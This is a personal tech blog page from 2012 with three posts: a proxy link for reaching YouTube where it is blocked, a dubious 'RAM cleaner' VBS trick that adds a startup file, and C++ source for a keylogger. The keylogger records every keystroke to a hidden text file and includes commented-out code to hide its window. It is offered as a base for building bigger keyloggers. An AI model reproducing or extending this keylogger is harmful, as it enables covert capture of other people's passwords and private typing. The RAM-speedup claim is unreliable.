Friday 2 November 2012

How to watch You tube in Pakistan and blocked areas

How to view youtube.com in  Pakistan, the answare is eassy just go tu the website and you would be rediractid to Youtube.com It Play in a high speed but you havent need any extra things just go

http://proxtub.appspot.com/


They website is only for educational purposes usage please uses it for what it is

Thursday 18 October 2012

Ram Cleaner(How to speed up your computer)

These are the Question Which  occur  mostly
How to Speedup your computer?
How to clear Ram?
How to make my computer faster?
My computer Hangs?
There are dozens of software  available  at the market for the  purposes  but they never do  actually  good things some of them Speed up your system but they have  installed  a lot of  Ad-wares  on your  computer  so now i am telling you a small  method  you will feel a real Change in the speed for short interval
(1)Open
         Notepad
(2)Type this
        mystring=(80000000)
(3)Save the file Where ever you want  with the name
        Ram.vbs
(4)Double Click on it and you will get the Result when ever you needed
Optional Steps:
(5)Place the file in startup Folder and you will when the computer starts it will refresh it


Friday 9 March 2012

keylogger in c++


Simple keylogger in c++

 Its a simple keylogger which will give you the basic idea of a keylogger and will provide a base for your great approaches.





//#define _WIN32_WINNT 0x0500
 #include<iostream.h>
#include<windows.h>
#include<fstream.h>
 using namespace std;
 int main(){
//Hiding the window
//HWND hWind = GetConsoleWindow();
//ShowWindow(hWind, SW_HIDE);
 ofstream file;
char i;
 while(1){
        for(int k=8;k<=190;k++){
                if(GetAsyncKeyState(k)==-32767){
                i=k;
                cout<<i;
                file.open("klog.txt",ios::app);
                        file<<i;
                        file.close();
                     }
                  } 
        }
return 0;
}